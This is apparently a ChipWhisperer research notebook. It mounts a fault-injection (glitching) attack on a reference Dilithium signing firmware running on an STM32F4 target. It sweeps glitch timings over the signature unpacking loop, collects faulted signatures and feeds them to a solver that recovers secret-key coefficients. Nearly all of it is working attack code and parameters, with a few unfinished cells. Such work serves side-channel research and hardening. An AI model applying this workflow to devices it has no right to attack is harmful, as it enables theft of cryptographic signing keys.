# Dilithium - Glitches - Signature - Only - Attack

In [None]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CW308_STM32F4'
SS_VER = 'SS_VER_2_1'

fw_path = "../../../hardware/victims/firmware/simpleserial-dilithium-ref/simpleserial-dilithium-ref-{}.hex".format(PLATFORM)

TIMEOUT_SIGNATURE_MS = 640
TIMEOUT_SIGNATURE_NS = TIMEOUT_SIGNATURE_MS * 1e6

In [None]:
import logging
logging.basicConfig(level=logging.NOTSET)
logging.getLogger('io.github.alex1s.python-dilithium').setLevel(logging.WARNING)
logging.getLogger('gurobipy.gurobipy').setLevel(logging.WARNING) # please be quiet gurobi
logging.getLogger().setLevel(logging.DEBUG + 1) # default logger should not be used anyways!
__LOGGER = logging.getLogger(__name__)
__LOGGER.setLevel(logging.DEBUG)
logging.getLogger("usb_ctrl").setLevel(logging.WARNING)

In [None]:
import sys
if '../../../software' not in sys.path:
    sys.path.append('../../../software')
if 'python-dilithium' not in sys.path:
    sys.path.append('python-dilithium')
if 'dilithium_solver' not in sys.path:
    sys.path.append('dilithium_solver')

In [None]:
import chipwhisperer as cw
import importlib
import json
import uuid
import datetime
import threading
import numpy as np
import ipywidgets as widgets
from chipwhisperer.capture.targets import TargetIOError, TargetTimeoutError
from dilithium import Dilithium
import struct
import random
from collections import defaultdict
import time
import math
from operator import itemgetter
import functools
import pickle
import timeit
import enum

In [None]:
%%bash
make -C ../../../hardware/victims/firmware/simpleserial-dilithium-ref

In [None]:
try:
    if not scope.connectStatus:
        scope.con()
except NameError:
    scope = cw.scope()

target = cw.target(scope, cw.targets.SimpleSerial2Dilithium)
target.scope = scope
target.con()

time.sleep(0.05)
target.dglitch_settings()  # dilithium glitch settings

d = target.dilithium

print("INFO: Found ChipWhisperer😍")

In [None]:
# uncomment the following line to program the firmware; this takes a little while ...
cw.program_target(scope, cw.programmers.STM32FProgrammer, fw_path)

In [None]:
# time for reboot_flush (also checks if chip functional ...)
target.reboot_flush()
timeit.timeit(target.reboot_flush, number=10) / 10

In [None]:
TEST_MSG = b'\x01'  # use b'\x00' if no shuffling is enabled

In [None]:
# also check if signing is done properly ...
import binascii
target.reboot_flush()
start = time.time()
target.sign(TEST_MSG)
print(time.time() - start)
sig_target = target.get_sig()
#print(d.signature(TEST_MSG, target.secret_key))
print("Target secret key", binascii.hexlify(target.secret_key))
#print("target", target.get_sig())
assert sig_target == d.signature(TEST_MSG, target.secret_key)

In [None]:
# check if loop duration is as expected ... ([15904, 31808, 63616, 79520])
target.reboot_flush()
assert target.loop_duration_sign == 3976, f'instead it is: {target.loop_duration_sign}'
target.loop_duration_sign

In [None]:
class Rating(enum.Enum):
    GOOD = 'good'
    NEUTRAL = 'neutral'
    BAD = 'bad'

class GroupStr(str):
    def __new__(cls, value: str, rating: Rating):
        new = super().__new__(cls, value)
        new.rating = rating
        return new

In [None]:
straight_line = {'slope': 62,
  'y_intercept': 55,
  'num_points': 28,
  'l': 'B',
  'total_good': 186,
  'total_bad': 781,
  'success_rate': 0.1923474663908997
}

# magic_numbers = (55, 117, 179, 241, 302, 365, 427, 488, 551, 613, 673, 736, 798, 857, 919, 983, 1045, 1109, 1170, 1233, 1295, 1353, 1419, 1481, 1543, 1605, 1663, 1728, 1791, 1853, 1915, 1977, 2039, 2101, 2163, 2225, 2287, 2349, 2411, 2473, 2535, 2597, 2659, 2721, 2783, 2845, 2907, 2969, 3031, 3093, 3155, 3217, 3279, 3341, 3403, 3465, 3527, 3589, 3651, 3713, 3775, 3837, 3899)
magic_numbers = [straight_line['y_intercept'] + poly_index * straight_line['slope'] for poly_index in range(d._polyz_unpack_num_iters - 1)]
ext_offsets = magic_numbers
offsets = (0.390625,)
widths = (1.562500,)
repeats = (1,)
messages = tuple(range(10000000)) # == inf
redos = (1,)  # one try per message

min_num_zeros = 2 * d.n

RES_FNAME = f'gc.results.pickled.signature-attacks-{datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S")}.pickle'
RES_FNAME

In [None]:
# uncomment following block if you want to search from the middle to the outside

#a =  ext_offsets[:len(ext_offsets) // 2][::-1]
#b =  ext_offsets[len(ext_offsets) // 2:]
#res = [None] * len(ext_offsets)
#res[1::2] = a
#res[::2] = b
#ext_offsets = res

ext_offsets

In [None]:
offsets

In [None]:
widths

In [None]:
repeats

In [None]:
messages

In [None]:
redos

In [None]:
min_num_zeros

In [None]:
import dilithium
d = dilithium.Dilithium(2)

In [None]:
GROUPS_ZEROS = tuple(GroupStr(f"{poly_index} zeros", Rating.GOOD) for poly_index in range(d._polyz_unpack_num_iters - 1))
GROUPS_OTHER = tuple(GroupStr(f"{poly_index} other", Rating.NEUTRAL) for poly_index in range(d._polyz_unpack_num_iters - 1))
GROUPS_TIMEOUT_COUNT = tuple(GroupStr(f"{poly_index} to count", Rating.BAD) for poly_index in range(d._polyz_unpack_num_iters - 1))
GROUPS_TIMEOUT_TIME = tuple(GroupStr(f"{poly_index} to time", Rating.BAD) for poly_index in range(d._polyz_unpack_num_iters - 1))
GROUPS_EXCEPTION_SIGN = tuple(GroupStr(f"{poly_index} exc sign", Rating.BAD) for poly_index in range(d._polyz_unpack_num_iters - 1))
GROUPS_EXCEPTION_GET_SIG = tuple(GroupStr(f"{poly_index} exc get_sig", Rating.BAD) for poly_index in range(d._polyz_unpack_num_iters - 1))
GROUP_CONSTANT = GroupStr("constant", Rating.BAD)

GROUPS = tuple()
for i in range(d._polyz_unpack_num_iters - 1):
    GROUPS += (
        GROUPS_ZEROS[i],
        GROUPS_OTHER[i],
        GROUPS_TIMEOUT_COUNT[i],
        GROUPS_TIMEOUT_TIME[i],
        GROUPS_EXCEPTION_SIGN[i],
        GROUPS_EXCEPTION_GET_SIG[i]
    )
GROUPS += (GROUP_CONSTANT,)
PARAMETERS = ('ext_offset', 'offset', 'width', 'repeat', 'message', 'redo')

In [None]:
import chipwhisperer.common.results.glitch as glitch
gc = glitch.GlitchController(groups=[str(g) for g in GROUPS], parameters=PARAMETERS)
gc.set_range("ext_offset", min(ext_offsets), max(ext_offsets))
gc.set_range("offset", min(offsets), max(offsets))
gc.set_range("width", min(widths), max(widths))
gc.set_range("repeat", min(repeats), max(repeats))
gc.set_range("message", min(messages), max(messages))
gc.set_range("redo", min(redos), max(redos))
gc.display_stats()

In [None]:
zero_widgets = []
for poly_index in range(d._polyz_unpack_num_iters - 1):
    zero_widgets.append([])
    for i in range(d.l):
        zero_widgets[poly_index].append(widgets.IntSlider(
            value=0,
            min=0,
            max=min_num_zeros * 5,
            step=1,
            description=f'{poly_index} {i}',
            disabled=True,
            continuous_update=False,
            orientation='horizontal',
            readout=True,
            readout_format='d'
        ))
display(*[widget for widgets in zero_widgets for widget in widgets])

In [None]:
def message_to_bytes(message: int) -> bytes:
    return struct.pack(">I", message)
def trig_count_threshold() -> int:
    return target.loop_duration_sign_threshold + (d.l - 1) * target.loop_duration_sign
trig_count_threshold()

In [None]:
gc_lock = threading.Lock()
def gc_add(group, parameters, strdesc=None, metadata=None) -> None:
    if group != GROUP_CONSTANT:
        if metadata is None:
            metadata = {}

        message_int = parameters[gc.parameters.index("message")]
        message_bytes = message_to_bytes(message_int)

        metadata = {
            **metadata,
            "global_counter": gc_add.global_counter,
            "message_int": message_int,
            "message_bytes": message_bytes,
            "trig_count": scope.adc.trig_count,
            "timestamp": time.time()
        }
        gc_add.global_counter += 1
    
    with gc_lock:
        try:
            gc.add(str(group), parameters, metadata=metadata)
        except TypeError:  # will be raised if we do not "gc.display_stats"; but not a problem: still collects all data
            pass
gc_add.global_counter = 0

In [None]:
gc_add(GROUP_CONSTANT, tuple([-1 for _ in gc.parameters]), metadata={
    'secret_key': target.secret_key,
    'trig_count_threshold': trig_count_threshold(),
    'group_to_rating': {str(g): g.rating.value for g in GROUPS},
    'start_times': {},
    'magic_numbers': magic_numbers,
    'min_num_zeros': min_num_zeros
})

In [None]:
def one_try(param_tuple, poly_index: int) -> None:
    """
    Try one fault parameter set.

    :param param_tuple: the parameters of the glitch (ext_offset, offset, width)
    :param action: what action is going to be glitched (polyz_unpack or signature)
    :param get_result_packed: callable 
    :returns: an upper bound on new zero coefficients
    """
    start = time.perf_counter_ns()
    target.reboot_flush()
    reset_duration_ns = time.perf_counter_ns() - start
    metadata = {'reset_duration_ns': reset_duration_ns}
    
    message = param_tuple[gc.parameters.index("message")]
    message_bytes = message_to_bytes(message)
    
    start_count = scope.adc.trig_count
    start_time = time.perf_counter_ns()
    
    """l - 1 normal iterations and one with threshold"""
    count_threshold = trig_count_threshold()
    
    # these TWO commands combined sets scope.adc.trig_count to zero
    scope.sc.arm(False)
    scope.arm()
    assert scope.adc.trig_count == 0
    
    target.sign_send(message_bytes)
    while target.in_waiting() == 0:  # no response from target
        if time.perf_counter_ns() - start_time > TIMEOUT_SIGNATURE_NS:
            gc_add(GROUPS_TIMEOUT_TIME[poly_index], param_tuple)
            return
        if scope.adc.trig_count > count_threshold:
            gc_add(GROUPS_TIMEOUT_COUNT[poly_index], param_tuple)
            return
        
    try:
        target.sign_recv(timeout=100)  # should be quick as target already started sending
    except TargetIOError:  # corrupted or no response from the target; we could but do not really care to differentiate
        gc_add(GROUPS_EXCEPTION_SIGN[poly_index], param_tuple)
        return
    
    try:
        signature_packed = target.get_sig()
    except TargetIOError:  # corrupted or no response from the target; we could but do not really care to differentiate
        gc_add(GROUPS_EXCEPTION_GET_SIG[poly_index], param_tuple)
        return
    
    # okay, now we are done with the target ...
    metadata['packed'] = signature_packed
    
    _, z, _ = d._unpack_sig(signature_packed)
    num_zeros = np.count_nonzero(np.abs(z) <= d.beta)  # TODO change to d._polyz_unpack_coeffs_per_iter // 2 or something like that ...
    if num_zeros > d._polyz_unpack_num_iters:
        gc_add(GROUPS_ZEROS[poly_index], param_tuple, metadata=metadata)
    else:
        gc_add(GROUPS_OTHER[poly_index], param_tuple, metadata=metadata)
        
    return np.count_nonzero(np.abs(z) <= d.beta, axis=1)
    

In [None]:
def save_results():
    with open(RES_FNAME, 'wb') as f:
        pickle.dump(gc.results, f)

In [None]:
save_thread_event = threading.Event()
def save_thread() -> None:
    while True:
        if save_thread_event.is_set():
            break
        with gc_lock:
            save_results()
        time.sleep(2 * 60)  # two minutes
        
thread = threading.Thread(target=save_thread)

In [None]:
def other_loops(poly_index: int, ext_offset: int):
    zeros = np.zeros(d.l)
    
    for offset in offsets:
        scope.glitch.offset = offset
        if gc.widget_list_parameter is not None:
            gc.widget_list_parameter[gc.parameters.index("offset")].value = offset
        for width in widths:
            scope.glitch.width = width
            if gc.widget_list_parameter is not None:
                gc.widget_list_parameter[gc.parameters.index("width")].value = width
            for repeat in repeats:
                scope.glitch.repeat = repeat
                if gc.widget_list_parameter is not None:
                    gc.widget_list_parameter[gc.parameters.index("repeat")].value = repeat
                for message in messages:
                    if gc.widget_list_parameter is not None:
                        gc.widget_list_parameter[gc.parameters.index("message")].value = message
                    for redo in redos:
                        if gc.widget_list_parameter is not None:
                            gc.widget_list_parameter[gc.parameters.index("redo")].value = redo

                        param_tuple = ext_offset, offset, width, repeat, message, redo
                        new_zeros = one_try(param_tuple, poly_index)

                        if new_zeros is not None:
                            zeros += new_zeros

                        if new_zeros is not None and np.any(new_zeros > 0):
                            for i in range(d.l):
                                zero_widgets[poly_index][i].value = zeros[i]

                        if np.all(zeros >= min_num_zeros):
                            return

In [None]:
thread.start()
logging.getLogger("ChipWhisperer Target").setLevel(logging.WARNING + 1)  # disable WARNING messages like "Read timed out: " or "Read timed out: Wÿ+"

start_time = time.time()
for poly_index, ext_offset in enumerate(ext_offsets):
    scope.glitch.ext_offset = ext_offset
    if gc.widget_list_parameter is not None:
        gc.widget_list_parameter[gc.parameters.index("ext_offset")].value = ext_offset
    gc.results.result_dict['constant'][0]['metadata']['start_times'][poly_index] = time.time()
    other_loops(poly_index, ext_offset)



end_time = time.time()
total_duration = end_time - start_time
print(f'total duration: {total_duration}s {total_duration/60}min {total_duration/3600}h')

print("Setting event for save thread.")
save_thread_event.set()
print("Joining with save thread.")
thread.join()

In [None]:
save_results()

In [None]:
exithere

In [None]:
sigs_faulted_unpacked = list(map(lambda sig_packed: d._unpack_sig_full(sig_packed), sigs_faulted))
from dilithium_solver.signature import Signature, calculate_c_matrix_np
from dilithium_solver.recover_s_1_entry import recover_s_1_entry
from dilithium_solver.parameters import Parameters

params = Parameters.get_nist_security_level(d.nist_security_level)

sigs = list(map(
    lambda sig_faulted: Signature(
        sig_faulted[1],
        sig_faulted[0],
        calculate_c_matrix_np(sig_faulted[0], params)
    ), sigs_faulted_unpacked))
s_1_entry_index = 0


s_1 = d._unpack_sk(sk)[4]
timeout = 10
threshold = d.beta
for i in range(len(sigs_faulted_unpacked[0][1])): # long version of saying "l"
    result = recover_s_1_entry(sigs, i, s_1, params, 142387, timeout, threshold) # this number is not relevant
    print(result)

In [None]:
scope.dis()
target.dis()